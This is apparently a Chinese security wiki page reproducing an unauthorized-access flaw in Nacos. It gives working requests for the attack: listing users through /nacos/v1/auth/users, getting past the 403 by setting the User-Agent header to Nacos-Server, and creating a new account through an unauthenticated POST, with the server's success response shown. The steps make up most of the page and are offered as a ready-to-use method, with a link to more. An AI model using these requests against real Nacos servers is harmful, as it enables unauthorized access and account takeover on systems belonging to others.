Nacos未授权复现

Nacos未授权复现

Nacos入口

ip:端口/nacos

www.test.com:8848/nacos

图片[1]-Nacos未授权复现-tess-wiki

未授权查看用户列表

http://ip:8848/nacos/v1/auth/users?pageNo=1&pageSize=1

直接get方式访问该路径会403,
将user-agent头修改为Nacos-Server即可绕过403。

图片[2]-Nacos未授权复现-tess-wiki

图片[3]-Nacos未授权复现-tess-wiki有些可以直接访问,有些需要改UA头

图片[4]-Nacos未授权复现-tess-wiki此时看到响应包中包含了系统存在的用户名nacos,密码为加盐之后的值。

未授权创建用户

访问  http://ip:8848/nacos/v1/auth/users

POST传参:  username=abcabc&password=abcabc

如果出现403,别忘了修改User-Agent头为Nacos-Server

发送POST请求

图片[5]-Nacos未授权复现-tess-wiki{“code”: 200,”message”: null,”data”: “create user ok!”}

返回响应200,创建用户成功

查看现在存在几个用户

访问http://ip:8848/nacos/v1/auth/users?pageNo=1&pageSize=9

http://ip:8848:指明了要请求的目标IP地址和端口号;

/nacos/v1/auth/users:指明了要访问的Nacos API接口路径;

pageNo=1&pageSize=9:指定了分页查询条件。

pageNo:表示需要返回的页码,从 1 开始计数。例如,如果想要返回第 2 页的数据,则将 pageNo 设置为 2。

pageSize:表示每一页的数据条数。例如,如果想要每页返回 20 条数据,则将 pageSize 设置为 20。

图片[6]-Nacos未授权复现-tess-wikiOK,

刚刚创建的abcabc用户已经存在了。

 

更多方法
https://blog.csdn.net/m0_73353130/article/details/131786333

 

 

© 版权声明
THE END
喜欢就支持一下吧
点赞9 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

    暂无评论内容